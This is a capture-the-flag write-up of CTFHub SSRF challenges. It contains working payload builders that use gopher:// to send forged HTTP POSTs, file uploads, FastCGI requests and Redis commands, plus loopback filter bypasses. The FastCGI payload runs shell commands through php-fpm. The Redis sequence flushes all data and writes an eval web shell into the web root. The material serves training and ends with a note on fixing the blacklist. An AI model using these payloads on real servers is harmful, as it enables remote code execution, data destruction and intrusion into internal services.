CTFHub SSRF
Bypass via protocols
POST request
Open index.php and press F12 to view the source:
<?php
error_reporting(0);
// Without a url parameter, redirect to /?url=_ so the page is always reached with one
if (!isset($_REQUEST['url'])){
    header("Location: /?url=_");
    exit;
}
// The user-supplied URL goes straight into curl: any scheme this curl build
// supports (http, gopher, dict, ...) can be requested from the server's own address
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
?>
The header("Location: /?url=_") redirects to the page with a url GET parameter, and whatever that parameter holds is fetched by curl unchanged. According to the challenge hint we have to send a POST request, and since curl accepts gopher://, a gopher URL lets us deliver an arbitrary TCP payload, a raw HTTP POST included.
Request ?url=127.0.0.1/flag.php and view the source (F12); the request we need to send to flag.php is:
POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
key=92635644157d7ddc6cf24da0e781978e
That is the raw request carrying the parameter. Content-Length must match the body exactly: key= plus the 32-character key is 36 bytes, and gopher sends the bytes as given, so a wrong length makes the backend wait or truncate.
Then URL-encode it three times. Each stage on the way decodes once: the $_REQUEST['url'] decode of the outer index.php, the $_REQUEST['url'] decode of the index.php that the first curl fetches (the payload below nests through it), and finally curl's gopher handler, which decodes %XX before writing to the socket. If the gopher URL were passed directly as the url parameter, two rounds would do. The value to pass as url is:
127.0.0.1/index.php/?url=gopher://127.0.0.1:80/_POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application%25252Fx-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253D92635644157d7ddc6cf24da0e781978e
That is the URL passed in.
The key (92635644157d7ddc6cf24da0e781978e here) is specific to your instance; substitute your own before sending.
And when I entered the parameter incorrectly in this challenge, the following message appeared:
File upload
This time a file has to be uploaded, but the page has no submit button, so edit the page source (F12) and add one:
<input type="submit" name="submit">
Submit the file and capture the request with a proxy.
URL-encode that captured request the same way as before (keeping the multipart boundary lines and every CRLF, with Content-Length matching the body) and wrap it into a new gopher:// request.
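Building these payloads by hand is error-prone (a wrong Content-Length or a missed encoding round silently breaks them), so here is an added Python helper, written for this page and not code from the writeup, CTFHub or gopherus. It assembles the raw POST for flag.php shown above, wraps it in a gopher:// URL with a chosen number of URL-encoding rounds, decodes it back for checking, and also builds a multipart/form-data body for the upload challenge. The upload path /upload.php, the field name file, the file name and the boundary string are assumptions for the demonstration; in the real challenge take them from the captured request.

```python
from urllib.parse import quote, unquote, unquote_to_bytes


def build_raw_request(method, path, host, body, content_type):
    """Assemble the raw HTTP/1.1 request that gopher will deliver byte for byte.

    Content-Length is computed from the body: gopher sends exactly what we give it,
    so a wrong length makes the backend wait for more data or truncate the body.
    """
    body = body if isinstance(body, bytes) else body.encode()
    headers = [
        f"{method} {path} HTTP/1.1",
        f"Host: {host}",
        f"Content-Type: {content_type}",
        f"Content-Length: {len(body)}",
    ]
    return "\r\n".join(headers).encode() + b"\r\n\r\n" + body


def build_multipart(field, filename, content, boundary="----CTFHubBoundary"):
    """Multipart body shaped like the one a browser sends for <input type=file>.
    Constructed example; a real capture supplies its own boundary and field name."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: text/plain\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail, f"multipart/form-data; boundary={boundary}"


def gopher_url(host, port, raw, rounds):
    """Wrap a raw request as gopher://host:port/_<data>, URL-encoding it `rounds` times.

    Round 1 is for curl's gopher handler, which decodes %XX before writing to the
    socket; every extra round survives one more $_REQUEST decode in front of curl.
    safe="" so that '/', ':', '=' and whitespace are all encoded.
    """
    data = raw
    for _ in range(rounds):
        data = quote(data, safe="")
    return f"gopher://{host}:{port}/_{data}"


def decode_gopher(url, rounds):
    """Reverse gopher_url: strip the prefix and undo `rounds` layers of encoding."""
    data = url.split("/_", 1)[1]
    for _ in range(rounds - 1):
        data = unquote(data)
    return unquote_to_bytes(data)


if __name__ == "__main__":
    raw = build_raw_request("POST", "/flag.php", "127.0.0.1:80",
                            "key=92635644157d7ddc6cf24da0e781978e",
                            "application/x-www-form-urlencoded")
    # three rounds: outer index.php decode, nested index.php decode, gopher handler
    print(gopher_url("127.0.0.1", 80, raw, 3))
    # upload variant (assumed path and field name); two rounds when passed directly
    body, ctype = build_multipart("file", "flag.txt", b"constructed file content")
    print(gopher_url("127.0.0.1", 80,
                     build_raw_request("POST", "/upload.php", "127.0.0.1:80", body, ctype), 2))
```

With rounds=3 the helper reproduces the URL given above character for character; decode_gopher is the quick way to confirm a hand-built payload really unwraps to the request you intended.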
FastCGI
Use gopherus to generate the payload; the one below targets /var/www/html/index.php and runs find / -name flag*:
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH70%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00F%04%00%3C%3Fphp%20system%28%27find%20/%20-name%20flag%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
Then URL-encode the part after /_ (from %01 onward) the same way as before, put gopher://127.0.0.1:9000/_ back in front, and that is the payload. The blob is a FastCGI request: a BEGIN_REQUEST record, a PARAMS record carrying SCRIPT_FILENAME and a PHP_VALUE that sets auto_prepend_file = php://input, and a STDIN record holding the PHP to execute.
The output gives the location of the flag.
Then run gopherus again with the command changed to cat that path.
Note: two files match flag; cat the one whose name ends in a string of digits.
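To show what the %01%01... blob that gopherus emits actually is, here is an added example, my own code rather than gopherus's or the writeup's, that encodes and decodes FastCGI records. Decoding the URL above with it recovers the PARAMS (SCRIPT_FILENAME, PHP_VALUE and the rest) and the PHP in STDIN; the encoder builds a request with standard 8-byte padding and a closing empty STDIN record for any script path and PHP body. The parameters and PHP body in the usage section are constructed for the demonstration.

```python
import struct
from urllib.parse import quote, unquote_to_bytes

FCGI_VERSION = 1
FCGI_BEGIN_REQUEST, FCGI_PARAMS, FCGI_STDIN = 1, 4, 5
FCGI_RESPONDER = 1


def fcgi_record(rec_type, content, request_id=1):
    """One record: 8-byte header, content, padding to an 8-byte boundary.
    Header: version, type, requestId (2), contentLength (2), paddingLength, reserved."""
    pad = (-len(content)) & 7
    header = struct.pack(">BBHHBx", FCGI_VERSION, rec_type, request_id, len(content), pad)
    return header + content + b"\x00" * pad


def fcgi_name_value(name, value):
    """Name-value pair: each length is 1 byte below 128, else 4 bytes big-endian, top bit set."""
    def length(n):
        return bytes([n]) if n < 128 else struct.pack(">I", n | 0x80000000)
    name, value = name.encode(), value.encode()
    return length(len(name)) + length(len(value)) + name + value


def fcgi_request(params, stdin, request_id=1):
    """Responder request: BEGIN_REQUEST, PARAMS, empty PARAMS (end of headers),
    STDIN with the body, empty STDIN (end of body). CONTENT_LENGTH is set from stdin."""
    params = {**params, "CONTENT_LENGTH": str(len(stdin))}
    begin = struct.pack(">HB5x", FCGI_RESPONDER, 0)  # role, flags, reserved
    body = b"".join(fcgi_name_value(k, v) for k, v in params.items())
    return (fcgi_record(FCGI_BEGIN_REQUEST, begin, request_id)
            + fcgi_record(FCGI_PARAMS, body, request_id)
            + fcgi_record(FCGI_PARAMS, b"", request_id)
            + fcgi_record(FCGI_STDIN, stdin, request_id)
            + fcgi_record(FCGI_STDIN, b"", request_id))


def _read_length(buf, i):
    if buf[i] < 128:
        return buf[i], i + 1
    return struct.unpack(">I", buf[i:i + 4])[0] & 0x7FFFFFFF, i + 4


def fcgi_parse(data):
    """Walk the records of a raw FastCGI request; return (params dict, stdin bytes).
    Padding is skipped via the header's paddingLength, so the fixed 4-byte padding
    gopherus writes parses just like properly aligned padding."""
    params, stdin, off = {}, b"", 0
    while off + 8 <= len(data):
        _ver, rec_type, _rid, clen, pad, _res = struct.unpack(">BBHHBB", data[off:off + 8])
        content = data[off + 8:off + 8 + clen]
        off += 8 + clen + pad
        if rec_type == FCGI_PARAMS:
            i = 0
            while i < len(content):
                nlen, i = _read_length(content, i)
                vlen, i = _read_length(content, i)
                params[content[i:i + nlen].decode()] = content[i + nlen:i + nlen + vlen].decode()
                i += nlen + vlen
        elif rec_type == FCGI_STDIN:
            stdin += content
    return params, stdin


def fcgi_gopher_url(host, port, params, stdin):
    """gopher:// URL carrying the request, encoded once for curl's gopher handler."""
    return f"gopher://{host}:{port}/_" + quote(fcgi_request(params, stdin), safe="")


def gopher_to_fcgi(url):
    """Decode the data part of a gopher:// URL and parse it as FastCGI."""
    return fcgi_parse(unquote_to_bytes(url.split("/_", 1)[1]))


if __name__ == "__main__":
    # Constructed parameters mirroring the gopherus payload: PHP_VALUE makes php-fpm
    # prepend php://input, i.e. the STDIN body, to the script named in SCRIPT_FILENAME.
    php_value = "allow_url_include = On\ndisable_functions = \nauto_prepend_file = php://input"
    params = {"REQUEST_METHOD": "POST", "SERVER_PROTOCOL": "HTTP/1.1", "DOCUMENT_ROOT": "/",
              "SCRIPT_FILENAME": "/var/www/html/index.php", "PHP_VALUE": php_value}
    print(fcgi_gopher_url("127.0.0.1", 9000, params, b"<?php system('id');?>"))
```

Running gopher_to_fcgi on the gopherus URL above prints the parameter dictionary and the 70-byte PHP body, which is the quickest way to see why CONTENT_LENGTH is 70 and what SCRIPT_FILENAME must point at before re-encoding the payload for the extra $_REQUEST decode.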
Redis protocol
Use gopherus again, this time in Redis mode.
Encode the gopher payload the same way as before and send it.
Then connect to the written web shell with AntSword (蚁剑).
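An added example, not gopherus's code or the writeup's, of what the Redis gopher payload contains: commands in the RESP wire format, which is plain text and easy to build and check without a generator. The write sequence below is the usual RDB-to-webroot trick (store the PHP as a value, point the dump directory and file name at the web root, SAVE); the webroot /var/www/html, the file name shell.php and the PHP one-liner are assumptions and must match the target.

```python
from urllib.parse import quote


def resp_command(*args):
    """Encode one command as a RESP array of bulk strings, the form redis-cli sends.
    Bulk strings are length-prefixed, so values may contain spaces, quotes or newlines."""
    out = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        arg = arg if isinstance(arg, bytes) else str(arg).encode()
        out.append(f"${len(arg)}\r\n".encode() + arg + b"\r\n")
    return b"".join(out)


def resp_decode(data):
    """Parse a stream of RESP arrays back into lists of bytes arguments (payload check)."""
    commands, i = [], 0
    while i < len(data):
        if data[i:i + 1] != b"*":
            raise ValueError(f"expected array at offset {i}")
        end = data.index(b"\r\n", i)
        count, i = int(data[i + 1:end]), end + 2
        argv = []
        for _ in range(count):
            if data[i:i + 1] != b"$":
                raise ValueError(f"expected bulk string at offset {i}")
            end = data.index(b"\r\n", i)
            size, i = int(data[i + 1:end]), end + 2
            argv.append(data[i:i + size])
            i += size + 2
        commands.append(argv)
    return commands


def webshell_commands(webroot, filename, php):
    """RDB-to-webroot write: store the PHP as a value, point the dump at the webroot, SAVE.
    The value is wrapped in newlines so the PHP tags survive inside the binary RDB file.
    FLUSHALL empties the instance first; drop it if existing keys matter."""
    return [
        resp_command("flushall"),
        resp_command("set", "1", "\n\n" + php + "\n\n"),
        resp_command("config", "set", "dir", webroot),
        resp_command("config", "set", "dbfilename", filename),
        resp_command("save"),
    ]


def redis_gopher_url(host, port, commands):
    """Concatenate the commands and encode once for curl's gopher handler."""
    return f"gopher://{host}:{port}/_" + quote(b"".join(commands), safe="")


if __name__ == "__main__":
    # Assumed webroot, file name and one-liner; the listener is the default Redis port
    cmds = webshell_commands("/var/www/html", "shell.php", "<?php @eval($_POST['cmd']);?>")
    print(redis_gopher_url("127.0.0.1", 6379, cmds))
    print(resp_decode(b"".join(cmds)))
```

Because every argument is length-prefixed, the PHP string never needs shell-style quoting; what does need care is the extra URL-encoding round for each $_REQUEST decode in front of curl, exactly as with the HTTP payload.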

<?php
error_reporting(0);
if (!isset($_REQUEST['url'])) {
    header("Location: /?url=_");
    exit;
}
$url = $_REQUEST['url'];
// Blacklist: rejects the URL if any of the four substrings appears anywhere in it
if (preg_match("/127|172|10|192/", $url)) {
    exit("hacker! Ban Intranet IP");
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
?>
The filter only blocks the substrings 127, 172, 10 and 192, and it matches them anywhere in the URL rather than checking the host. localhost bypasses it, and the numeric forms of 127.0.0.1 (decimal 2130706433, hex 0x7f000001, octal 0177.0.0.1) still work because none of them contains a blocked substring; the short form 127.1 does not help, since it still contains 127.
DNS rebinding bypass
A tutorial is shown when the challenge is started.
Bypass with DNS rebinding: point one domain name at two A records, a public address and 127.0.0.1, so that the check and curl's actual fetch can get different answers.
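An added example, not part of the writeup, that runs the page's regex over a URL and, separately, works out where curl would actually connect, so the filter's verdict and the real target can be compared side by side. It assumes curl resolves numeric hosts the way inet_aton does (1 to 4 dot-separated parts in decimal, 0x hex or leading-zero octal) and that localhost maps to 127.0.0.1 through the usual hosts entry.

```python
import re
from urllib.parse import urlsplit

# The page's blacklist, verbatim: a substring match anywhere in the URL, not a host check
BLACKLIST = re.compile(r"127|172|10|192")


def filter_blocks(url):
    """True when the PHP preg_match above would reject the URL."""
    return BLACKLIST.search(url) is not None


def parse_ipv4_literal(host):
    """Parse the numeric host forms inet_aton accepts: 1 to 4 dot-separated parts,
    each decimal, 0x-prefixed hex or 0-prefixed octal; the last part fills all
    remaining bytes. Returns the dotted quad, or None if it is not such a literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if re.fullmatch(r"0x[0-9a-f]+", part.lower()):
            base, digits = 16, part[2:]
        elif re.fullmatch(r"0[0-9]+", part):
            base, digits = 8, part          # leading zero means octal, as in inet_aton
        elif re.fullmatch(r"[0-9]+", part):
            base, digits = 10, part
        else:
            return None
        try:
            values.append(int(digits, base))
        except ValueError:                  # e.g. "08": octal form with a non-octal digit
            return None
    *lead, last = values
    if any(not 0 <= v <= 255 for v in lead) or not 0 <= last < 256 ** (4 - len(lead)):
        return None
    number = 0
    for v in lead:
        number = (number << 8) | v
    number = (number << (8 * (4 - len(lead)))) | last
    return ".".join(str((number >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def effective_target(url):
    """Where curl would actually connect. 'localhost' -> 127.0.0.1 assumes the usual
    hosts entry; any other non-numeric host is returned as a name still to be resolved."""
    host = urlsplit(url).hostname or ""
    if host == "localhost":
        return "127.0.0.1"
    return parse_ipv4_literal(host) or host


def check(url):
    """What the filter decides versus where the request really goes."""
    return {"blocked": filter_blocks(url), "target": effective_target(url)}


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1/flag.php", "http://127.1/flag.php",
                      "http://localhost/flag.php", "http://2130706433/flag.php",
                      "http://0x7f000001/flag.php", "http://0177.0.0.1/flag.php",
                      "http://example.com:8010/"):
        print(f"{candidate:35} {check(candidate)}")
```

The last candidate shows the other half of the problem with substring blacklists: a harmless external URL is rejected just because its port contains 10, while four different spellings of the loopback address sail through. A check that resolves the host and compares the resulting address against private ranges does not have either failure.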